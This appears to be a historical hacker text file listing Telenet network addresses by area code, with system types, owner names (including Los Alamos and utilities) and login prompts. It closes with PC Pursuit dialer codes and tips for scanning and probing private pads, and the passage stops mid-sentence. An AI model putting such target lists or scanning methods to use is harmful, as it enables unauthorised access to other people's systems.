$ 140 AOS
* 141
* 142


505--NEW MEXICO--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 31 ID
$ 33 AOS
* 34
$ 36 AOS
$ 40 AOS
* 45
$ 46 AOS
$ 51 AOS
$ 52 AOS
$ 53 AOS
$ 56 AOS
$ 57 AOS
$ 60 ICN Username:
$ 61 Los Alamos
$ 70 AOS
$ 72 AOS
$ 74 AOS
$ 75 AOS
$ 77 AOS
$ 78 AOS
$ 132 AOS
$ 133 AOS
* 134
$ 136 AOS
$ 137 AOS
$ 139 AOS
$ 144
$ 150


509--WASHINGTON--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 25 AOS
$ 26 AOS
$ 31 AOS
$ 32 ID
* 33
$ 48 AOS
$ 50 AOS
$ 73 AOS
$ 79 AOS
* 130
* 140
* 145


511--UNKNOWN--ADDRESSES SCANNED: 0-250

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
87


512--TEXAS--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 5
$ 33 PRIME BROWNS
$ 34 PRIME AUSTIN
40
* 55
* 62
* 63
* 64
* 65
136
* 139
142 VAX Gould Inc.
$ 242 Primefax Info Service


513--OHIO--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
30 LEXIS/NEXIS
31 Meadnet
* 32
$ 33 PRIME D01
$ 34 VAX
$ 37 PRIME E03
$ 55 PRIME I01
$ 57 PRIME E04
59 Develnet
$ 65 VAX
* 66
$ 67 PRIME E09
$ 68 PRIME X01
* 69
$ 72 PRIME O1
* 73
$ 74 PRIME W01
* 75
$ 77 PRIME M01
$ 78 PRIME A02
$ 79 PRIME C2
$ 80 JETNET EVENDALE
131 LEXIS/NEXIS
132 "
133 "
134 "
* 140
143 VAX
* 144
* 158


515--IOWA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
30 LEXIS/NEXIS
31 "
$ 39 PRIME NVSL
$ 40 ID
* 41
* 42
$ 43 PRIME DESMOM
131 LEXIS/NEXIS


516--NEW YORK--ADDRESSES SCANNED: 0-700

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
30 VAX OFFICE
35 CCI MULTILINK
* 38
$ 41 VAX
45 VM/370
47
48a Customer id:
49a "
50a "
* 140
$ 141 # CONNECT REQUESTED
157
$ 232 HP-3000
600 PRIME
* 601
610 PRIME P550
617 Pi-Net
618 Pi-Net
625 VAX
655


517--MICHIGAN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 40
$ 42 AOS


518--NEW YORK--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
30 USSMSG2
31 "
35 "
36 "
37 "


601--MISSISSIPPI--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 31 ID
$ 33 PRIME GLFPRT
* 36
* 37
* 40


602--ARIZONA--ADDRESSES SCANNED: 0-1000

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 22 PC Pursuit Dialer (300)
$ 23 PC Pursuit Dialer (1200)
$ 26 PC Pursuit Dialer (2400)
* 30
* 32
$ 33 AOS
$ 34 AOS
$ 35 GTE COMMUNICATION SYSTEMS
$ 53a CYBER
* 55
$ 56 AOS
$ 57 AOS
$ 58 AOS
$ 61 AOS
$ 62 ID
$ 65 AOS
* 66
$ 67 AOS
$ 100 AOS
* 131
* 133
141a
142
$ 242 AOS
$ 344 VAX BUSTOP
* 349
* 350
* 351
* 352
* 353
* 354
* 355
* 356
* 357
* 358
* 359
* 360
* 361
603
$ 630 >


603--NEW HAMPSHIRE--ADDRESSES SCANNED: 0-700

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 20 Dartmouth College
$ 30 AOS
* 33
$ 36 ID
$ 37
$ 40
46 USER NUMBER--
51 CHUBBS online
53 CHUBBS online
$ 57 ID
* 58
66 USER NUMBER--
135 VM/370
136 VM/370
* 137
603 VAX


606--KENTUCKY--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 31 ID
$ 37 AOS
44 HP-3000


607--NEW YORK--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 30
* 32
44 enter system id
45 "
70 PRIME FDC99
* 131
* 136


608--WISCONSIN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
35 enter logon command
$ 140 ID
* 141


609--NEW JERSEY--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 23 enter class
$ 26 UNSUPPORTED FUNCTION
42 Dow Jones
46 Dow Jones
$ 47 HP-3000
$ 61 UC
$ 63 UC
$ 68 UC
$ 73
100 PRIME
124
$ 125 HP-3000
$ 126 UC
$ 132 PRIME MOORES
$ 136 Twain Terminal Server
138 PRIME HCIONE
$ 141 UNSUPPORTED FUNCTION
$ 145 ID
170 PRIME
* 171
$ 172 UC
232a MHP2021 APPLICATION:
242 Dow Jones
243 Dow Jones
244 Dow Jones


611--UNKNOWN--ADDRESSES SCANNED: 0-400

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
25 TRANSEND
26 "
27 "
28 "
39 CCF Development System
56 CCF Computing Facility
60 Nexnet
120 VAX
130 TOPS-20 F.A.S.T.
145 Good Evening,Please Logon:
150 PRIME MHT850
192 PRIME
193 PRIME
194 PRIME
195 PRIME
196 PRIME LDN
198 PRIME DEV2
234
235 MHCOMET
236 "
237 "
238 "


612--MINNESOTA--ADDRESSES SCANNED: 0-500

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
21a
$ 22 PC Pursuit Dialer (2400)
23 WESTLAW
$ 33 ID
34 WESTLAW
36
37 WESTLAW
$ 44 AOS
$ 46 CDCNET
$ 52 PRIME
* 53
56 WESTLAW
57 "
$ 69 ID
$ 70 AOS
* 71
$ 120 PC Pursuit Dialer (300)
$ 121 PC Pursuit Dialer (1200)
$ 131 ID
* 132
* 138
$ 139 VAX
$ 162 PRIME PIERRE
* 231
* 232
* 233 AOS
236
240 MSC X.25 Gateway
* 251
* 252
$ 260 CDCNET
270 WESTLAW
271 "
* 332
* 333
$ 340 AOS
$ 351 AOS
356 WESTLAW
357 "
358 "
359 "
362 "
363 "
364 "
365 "
366 "
367 "
369 "
385
391 WESTLAW
393 "
* 430
442 please LOGIN


614--OHIO--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 ID
* 36
* 130
$ 131 AOS
* 132


615--TENNESSEE--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 31 ID
$ 32
$ 33 PRIME FRKFRT
$ 34 AOS
* 36
* 50
* 55
139a Telenet Async to 3270


616--MICHIGAN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTE

  
M NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
45 VAX ACTEST
$ 50
$ 51
58 MHP201A
63 Meridian


617--MASSACHUSETTS--ADDRESSES SCANNED: 0-1100

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
20 PRIME PBN27
22 PRIME BDSD
* 26
* 29
$ 30 GS/1
37 PRIME BDSH
46 PRIME BDSS
$ 47 ENTER ACCESS PASSWORD:
48 VAX
* 51
$ 56
* 61a
$ 64 PRIME OPS
67 PRIME IRI System 1
72 PRIME IRI System 2
74 PRIME ENB
* 78
* 114
* 115
143 IDC/370
147 HP-3000
152 ENTER LOGON
* 153
158 PRIME BDSW
164
169
201
205 AOS MONARCH
206
226 VM/370
* 230
236 VAX Thompson Financial Network
237 UNIX b1cs4
249 Decserver
250 NDNA
255 PRIME PBN43
256 MGS Teaching Program
* 266
270 VAX SNOOPY
273 enter system id
* 274
291
$ 311 PC Pursuit Dialer (300)
$ 313 PC Pursuit Dialer (1200)
330 VAX
* 336
$ 341 VAX
$ 347 HP-3000
349
350 PRIME PBN39
351 PRIME BDSU
352 PRIME OASB
354 VAX Anchor Comm. Router
359 VAX HEWEY
* 371
* 372
379 $$ 4200 MODEL:
380 PRIME L01
381 PRIME P01
382 PRIME Y01
383 PRIME H02
387 PRIME B01
388 $$ 4200 MODEL:
391 PRIME P01
393 PRIME Y04
398 PRIME V03
437 HP-3000
443 IDC/370
446 PRIME ENO
447 PRIME ENL
451
452 PRIME NET
454 PRIME NORTON
457 PRIME NNEB
476 PRIME NNEB
* 460
* 465
491 PRIME ROCH
492 PRIME MELVLE
493 PRIME STMFRD
499 PRIME SYRA
501 PRIME OASC
502 PRIME APPLE
510 PRIME EN.C06
515 UNIX
516 PRIME PBN38
517 PRIME PBN38
518 PRIME BDSA
519 PRIME PBN54
520 PRIME PBN57
525 PRIME IRI System 8
530 Maxlink
541 PRIME BDSS
543 PRIME PBN37
550 PRIME B01
551 PRIME CSP-A
553 PRIME BDSQ
556 PRIME
558 PRIME CSSS.A
560 PRIME BDSN
562 PRIME BDS2
563 PRIME
568 PRIME OASI
575 PRIME PBN50
577 PRIME B30
578 PRIME B04
583 PRIME MD.HFD
587 PRIME TR.SCH
* 588
$ 589
* 590
591 PRIME EN.M19
593 PRIME BDSO
596 PRIME MKT
597 PRIME BDSB
599 PRIME OASJ
618 UNIX
* 623
641 AOS Timeplace Inc.
649 PAPERCHASE
654 PRIME IRI System 9
710 PRIME MD.ATC
711 PRIME AESE01
713 PRIME PEACH
716 PRIME WAYNE
717 PRIME ETHEL
718 PRIME BUGS
722 PRIME PBN31
723 PRIME MD.NJ
724 PRIME NYMCS
725 PRIME PRNCTN
726 PRIME NJCENT
736 VAX Butterworths
737 VAX "
$ 840 PRIME WALTHM
850 PRIME MD-CHI
851 PRIME PBN30
852 PRIME MD.LP1
855 PRIME TRNG.C
856 PRIME CS.CHI
857 PRIME CS.OAK
858 PRIME CS-DEN
859 PRIME AWCE02
861 PRIME PTCDET
862 PRIME DRBN1
864 PRIME CS.DET
865 PRIME MD.DET
866 PRIME MD.DAC
867 PRIME ACEC01
868 PRIME MD.GR
870 PRIME CS.IND
871 PRIME MD.IND
872 PRIME MD.PIT
873 PRIME ACMC01
874 PRIME PITTCS
875 PRIME MD.CLE
902 PRIME MD.HOU
905 PRIME OASG
908 PRIME WMCS
910 PRIME CSWDC
911 PRIME VIENNA
912 PRIME BALT
928 PRIME CS.HOU
930 PRIME MD.AUS
931 PRIME CS.SCR
937 PRIME TRNED
957 PRIME ZULE
958 PRIME EDOC1
959 PRIME FUZZY
962 PRIME PBN49
* 971
* 972
* 973
* 974
980 PRIME WUFPAK
981 PRIME WMMKT
986
993 CU-Manchester-
995 PRIME ATC55
996 PRIME PBN65
998 PRIME TRNGB
3088 VAX DELPHI

619--CALIFORNIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 31 Environment Ctrl Monitor
41 VM/370
* 51
56
57
$ 62 AOS
$ 63 AOS


626--UNKNOWN--ADDRESSES SCANNED: VARIOUS

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 1000 PRIME
$ 1002 VAX Pacific Gas & Electric


703--VIRGINIA--ADDRESSES SCANNED: 0-1300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 32
$ 33 AOS
40 VAX
41 VAX
$ 42 ENTER USERID:
44 AOS Project HOPE
$ 53 HP-3000
55 ENTER SWITCH CHARS
141 enter /login
142 "
160 VAX
163a
$ 168
* 176
$ 177 AOS
* 206
* 207
$ 253 AOS
$ 254 AOS
$ 255 AOS
$ 256 AOS
$ 257 AOS
$ 262 AOS
* 340
* 341
* 342
$ 344 ** NETWORK SIGN-ON FAILED:
* 346
367 P.R.C.
371 P.R.C.
* 377
431 TACL 1>
* 460
* 461
$ 463 DEC-20
* 464
$ 466 DEC-20
* 467
$ 468
$ 469 Decserver
* 470
511 bcs network
512 bcs network
530 bcs network
$ 1000 FCC FIRSTRA'
$ 1001 FCC FIRSTRA'


704--NORTH CAROLINA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 31 AOS
$ 32 AOS
* 60
* 61
* 62
$ 63 AOS
* 64
* 168
170
171
173


707--CALIFORNIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 48 AOS
$ 49 AOS
$ 50 AOS
$ 51 AOS
$ 52 AOS


711--UNKNOWN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
15 PRIME


713--TEXAS--ADDRESSES SCANNED: 0-500

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 24 PC Pursuit Dialer (2400)
* 42
$ 43 ID
$ 44 ID
* 58
73 PRIME TXNODE
76 %u@IUeASID@cAbR@CUDEz
77 "
79 "
80 "
81 "
$ 113 PC Pursuit Dialer (300)
$ 114 PC Pursuit Dialer (1200)
146 %u@IUeASID@cAbR@CUDEz
* 167
* 224
* 227
* 228
* 232
* 234
$ 238 HP-3000
239 Compaq
255 PRIME SYS1
$ 260 PRIME HOUSTN
276
* 335
336 PRIME GANODE
340a
345 COMM520
346a Telenet Async to 3270
$ 364 VAX
366 PRIME CANODE
368 PRIME MANODE
$ 371 Coca-Cola Foods
431


714--CALIFORNIA--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 4 PC Pursuit Dialer (2400)
$ 23 PC Pursuit Dialer (300)
$ 24 PC Pursuit Dialer (1200)
$ 33 911 Monitor ECM
$ 41 AGS
48 PRIME TWCALF
49 SERVICE ID=
$ 55 HP-3000
$ 62 AOS
$ 63 AOS
$ 64 AOS
$ 65 AOS
$ 66 AOS
$ 67 AOS
$ 68 AOS
72 PRIME FSCOPE
$ 102 PC Pursuit Dialer (2400)
$ 119 PC Pursuit Dialer (300)
$ 121 PC Pursuit Dialer (1200)
$ 130 MMSA
131 PRIME CAJH
* 133
* 145
$ 160 HP-3000
* 164
166 HP-3000
* 167
* 168
* 169
171 COMMAND UNRECOGNIZED
172 "
* 178
$ 210 PC Pursuit Dialer (300)
$ 213 PC Pursuit Dialer (1200)
$ 240 AOS
246 COMMAND UNRECOGNIZED
$ 272 AOS
* 273
$ 274 AOS
$ 275 AOS
$ 276 AOS


716--NEW YORK--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
23 enter user code please
25 "
31 HP-3000
50
130 enter logon request-
131 "
133 "
$ 135 VAX


717--PENNSYLVANIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
8 VM/370
* 24
* 31
* 32
* 33
* 34
40 PRIME IREX
42 PRIME IREX
45 VOS
46 VOS
47 Camp Hill Mgt. Info Center
48 "
50
51 Telenet Async to 3270
52a Telenet Async to 3270
53
* 150
* 153
* 154
* 160
* 161
* 162
* 163


801--UTAH--ADDRESSES SCANNED: 0-500

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 12 PC Pursuit Dialer (2400)
$ 20 PC Pursuit Dialer (300)
$ 21 PC Pursuit Dialer (1200)
24 Wasatch System
25 "
26 "
27 "
$ 35 ID
* 37
$ 39 AOS
$ 44 AOS
$ 49 AOS
$ 52 AOS
$ 54 VAX
$ 57 AOS
$ 60 AOS
$ 62 AOS
$ 65 AOS
$ 130 AOS
144
* 150
$ 151 AOS
* 152
$ 153 AOS
176
$ 231 AOS
$ 232 AOS
$ 239 AOS
250 ID?>
257
258


802--VERMONT--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 31 AOS
$ 32 AOS
$ 33 ID
* 35
* 36
$ 37 AOS
$ 38 AOS


803--SOUTH CAROLINA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 30
* 32
$ 50
$ 51 KEMET ELECTRONICS
* 55
60 Telenet Async to 3270
61a Telenet Async to 3270
$ 70 AOS
* 71
* 74
$ 77 AOS
131 Kemet
132a Telenet Async to 3270
* 133
$ 135 PRIME PRISM


804--VIRGINIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
35 VAX
* 43
* 45
$ 60 ID
* 61
* 62
* 155
$ 160 AOS


805--CALIFORNIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
50 VAX
51 VAX
* 58
* 59
* 60
* 61
* 62
* 63
* 64
* 65
* 74
90
100
101 UNIX salt.acc.com
130
150 PRIME MBM


808--HAWAII--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 40 VAX
100 PRIME


811--GTE--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 15
17 HP-3000
21 UNIX GTE RPU2
22 UNIX GTE IPU
24 UNIX GTE RPU1
25 TACL 1>
28 TACL 1>
118 CANNOT EXEC!
123 HP-3000
* 129
* 143
* 217
* 219


812--INDIANA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS


813--FLORIDA--ADDRESSES SCANNED: 0-700

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 20 PC Pursuit Dialer (300)
$ 21 PC Pursuit Dialer (1200)
* 33
35 PRIME S9750
43 ** 4200 TERMINAL TYPE:
$ 52 DEC-20 Price Waterhouse
$ 53 VAX
$ 55 PRICE WATERHOUSE
$ 59 Telenet Async to 3270
73 VM/370
74 ** 4200 TERMINAL TYPE:
* 76
$ 124 PC Pursuit Dialer (2400)
131 IBM INFORMATION SERVICES
143 "
147 "
* 148
* 151
* 153
* 154
160 VAX
161 VAX
164 VAX
* 165
166a Telenet Async to 3270
* 167
$ 169 GS/1
172 IBM INFORMATION SERVICES
174 "
210
214
215
218
* 222
$ 225 ----SECURITY SUBSYSTEM----
$ 226 "
* 265
267 IBM INFORMATION SERVICES
$ 268 U#=
269a VAX Addidas
271 Access Code:
272 PRIME
275 Access Code:
277 U#=
* 330
344 TACL 1>
346 "
350 VAX
* 351
355
* 360
* 361
430 Telenet Async to 3270
431a Telenet Async to 3270
436 U#=
438 VAX DEC/ETONIC
* 460
465 Martin Marietta
466 Martin Marietta
467 Enter Switch Characters
468 "
660


814--PENNSYLVANIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
50 PRIME SYSA
* 53
$ 130 VAX
$ 137 AOS


816--MISSOURI--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
36
* 38
* 43
$ 44 AOS
* 45
$ 57 AOS
$ 58 AOS
* 59
$ 62
77
$ 104 PC Pursuit Dialer (300)
$ 113 PC Pursuit Dialer (1200)
$ 150
* 157
* 161
189 CDCNET


817--TEXAS--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 33
$ 35 PRIME FWRTH
* 36
* 37
141 VAX Tandy Information Service
* 160
* 161
* 162


818--CALIFORNIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 20
$ 21 PC Pursuit Dialer (1200)
* 29
* 50
$ 130
* 139


888--GTE HAWAIIAN TELEPHONE--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 25
$ 51
* 52
$ 53 PRIME HAWAII
* 30
* 45
* 50


890--UNKNOWN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 100 ADTN USER ID
$ 102 "
$ 103 "
$ 109 GS/1
$ 110 ADTN USER ID
$ 125 "
$ 126 "
$ 129 "


901--TENNESSEE--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 30
* 134


904--FLORIDA--ADDRESSES SCANNED: 0-400

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 34 AOS
$ 41 AOS
$ 45 AOS
$ 50 AOS
51 COMMAND UNRECOGNIZED
52 COMMAND UNRECOGNIZED
53 COMMAND UNRECOGNIZED
$ 55 AOS
$ 56 AOS
$ 58 ID
* 60
141
* 160
* 161
232
* 235


907--ALASKA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 31 ID
* 32
$ 33 AOS
* 34
$ 35 AOS
$ 44
$ 45 AOS
* 46
$ 47 AOS
$ 48 AOS
* 50
* 51
$ 130 AOS
138


909--TELENET--ADDRESSES SCANNED: 0-1000

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 3 Telenet Port
8 PRIME
9 PRIME
10 PRIME
12 PRIME
13
14 Telenet Port
23 PRIME
26 PRIME
27 PRIME
38 PRIME
39 USER ID
44 PRIME
52
53 PRIME
54
56 PRIME
60 PRIME
61 PRIME
62 PRIME
63 PRIME
65 PRIME
73 PRIME
77 PRIME
78 PRIME
79 MHP201A
90 PRIME
92 PRIME
94 PRIME
95 PRIME
97 PRIME
98 PRIME
100 PRIME
101 USER ID
102 USER ID
104
117 PRIME
123 PRIME
130 PRIME
131 PRIME
136 PRIME
137 PRIME
139 PRIME
141 PRIME
143 PRIME
144 PRIME
146 PRIME Telemail
147 PRIME "
148 PRIME "
149 PRIME "
151
153 TACL 1>
154 "
155 PRIME Telemail
158 PRIME "
159 PRIME "
160 PRIME "
161 PRIME "
162 PRIME
165 PRIME Telemail
168 PRIME "
* 170
171
172
173 PRIME
176 PRIME
178 USER ID
179 "
184 "
187
197
198
205 PRIME
206 PRIME
235 PRIME
236 PRIME
239 PRIME
$ 312 !Load and Function Tester
$ 314 "
316 "
$ 317 "
318 "
319 "
325
328 !Load and Function Tester
330 FRAME TESTER?
338 !Load and Function Tester
400 PRIME Telemail
401 PRIME "
403 PRIME "
404 PRIME "
406 PRIME "
407 PRIME
408 PRIME
409 PRIME
508 PRIME
600 VAX
615 PRIME
622 PRIME
623 PRIME
624 PRIME
626 PRIME
627 PRIME
628 PRIME
629 PRIME
630 PRIME
631 PC Pursuit BBS
632
633
634
635
643 PRIME
646
650 PRIME
651 PRIME
656
657
658
659
660
661
663
664
675 PRIME
676 PRIME
677 PRIME
678 PRIME
679 PRIME
680 PRIME
686 Telenet FE BBS1
747
751 TELENET MUS/XA NETWORK
761 PRIME Telemail
762 PRIME
763 PRIME
764 Telenet Async to 3270
767 TELENET NUS/XA NETWORK
770 PRIME
772 PRIME
773 PRIME
777 Telenet Async to 3270
779 "
781 "
782 "
784 "
798 PRIME
799 PRIME
800 PRIME
801 PRIME
805 PRIME
810 PRIME
811 PRIME
815 PRIME
816 PRIME
817 PRIME
818 PRIME
819 PRIME
822 PRIME
823 PRIME
824 PRIME
825 PRIME
826 PRIME
827 PRIME
828 PRIME
830 PRIME
831 PRIME
832 PRIME
833 PRIME
834 PRIME
840 PRIME Telemail
841 PRIME "
842 PRIME "
843 PRIME "
844 PRIME "
845 PRIME "
846
847
848 PRIME Telemail
893 PRIME
894 PRIME
900 PRIME
901 PRIME
902 PRIME
911 PRIME
912 PRIME


910--TELENET--ADDRESSES SCANNED: VARIOUS

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
100 PRIME
200 PRIME
300 PRIME
400 PRIME
500 PRIME


912--GEORGIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
30
* 31


913--KANSAS--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 32 ID
* 34
$ 150 PRIME TOPEKA


914--NEW YORK--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 32 VM/370
33 VM/370
34 >>
35 >>
* 38
$ 41 VM/370 Pepsi
* 42
50 Mnematics
133
* 160


916--CALIFORNIA--ADDRESSES SCANNED: 0-700

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 7 PC Pursuit Dialer (2400)
$ 11 PC Pursuit Dialer (300)
$ 12 PC Pursuit Dialer (1200)
$ 30 AOS
$ 33 AOS
$ 34 PRIME SACRA
$ 36 ID
$ 39 AOS
$ 40 AOS
$ 41 ID
55 PRIME FIMSAC
$ 56 AOS
$ 57 AOS
$ 58 AOS
$ 59 AOS
$ 63 AOS
$ 64 AOS
$ 130 AOS
$ 131 AOS
$ 132 AOS
$ 133 AOS
$ 134 AOS
$ 141 AOS
$ 168 AOS
* 169
* 171
$ 232 AOS
$ 233 AOS
* 234
$ 235 AOS
$ 236 AOS
240
268 Telenet Async to 3270
* 330
* 331
* 332
* 333
* 334
* 335
* 336
* 337
* 338
* 339
350
* 360
* 361
* 362
* 363
* 364
* 365
* 366
* 367
* 368
* 369
$ 530
* 531
607 UNIX IPA State Net
608 UNIX IPA State Net


918--OKLAHOMA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 ID
40 CUSTOMER ID:
105 American Airlines
130 American Airlines


919--NORTH CAROLINA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 20 PC Pursuit Dialer (300)
$ 21 PC Pursuit Dialer (1200)
$ 33 ID
$ 34 AOS
* 36
* 38
43 enter system id
44 "
46 "
47 VM/370 Northern Telcom
* 58
$ 59 AOS
* 60
$ 70 HP-3000
$ 124 PC Pursuit Dialer (2400)
$ 130 HP-3000
135 USA TODAY Sports Center
* 139
$ 145
* 158
* 159


MNEMONIC ADDRESSES
------------------

$ AFS
APPLE
BCS
BIONET
BLUE
BRS
CCC03
CMS
$ COM
D30
D31
D32
D33
D34
D35
D36
D37
D41
D42
D43
D44
D45
D46
D50
D51
D52
D53
D54
D55
D56
D57
D58
D61
D62
D63
D64
DELPHI
DOW
DUNS
EIES
GOLD
GTEM
HHTRAN
INFO
IRIS
MMM
MUNI
NASA
NET
NSF
OAG
OLS
ORBIT
PORTAL
PRIME
S10
S11
S12
S13
S14
S15
S16
S17
S18
S19
SIS
SIT
SPR
STK1
STK2
STK3
STK4
SUMEX
USIBM
USPS
VUTEXT



PC-PERSUIT DIALERS
------------------

C D/CITY/BAUD,ID,PASSWORD

A/C CITY
--- -----
201 NJNEW
202 DCWAS
203 CTHAR
206 WASEA
212 NYNYO
213 CALAN
214 TXDAL
215 PAPHI
216 OHCLV
303 CODEN
305 FLMIA
312 ILCHI
313 MIDET
314 MOSLO
404 GAATL
408 CASJO
414 WIMIL
415 CAPAL
415 CASFA
503 ORPOR
602 AZPHO
612 MNMIN
617 MABOS
619 CASAD
713 TXHOU
714 CARIV
714 CASAN
801 UTSLC
813 FLTAM
816 MOKAN
818 CAGLE
916 CASAC
919 NCRTP



TELENET SCANNING TIPS
--------------------

There are a few things to take into consideration when using Telenet.
First of all, ignore error messages! When something says rejecting, or
illegal address, or remote procedure error, try it again using sub-
addresses. (IE: 100100a, 100100b...100100.99) I have also found that
some addresses that are rejecting merely require that you connect to it
using an id. Many of the things that respond with illegal address are
telenet pads. Most of the public pads are in the following ranges: 0-20,
80-100, 180-190. Many times you will find private pads. If you are very,
very lucky you will find that pad-to-pad connections are possible to these
privately owned pads. However, most of the time they are not operating, so
your chances of actually picking anything up are very slim.

When I did this directory I only checked the first few sub addresses on
addresses that didn't immediately connect, so needless to say there are
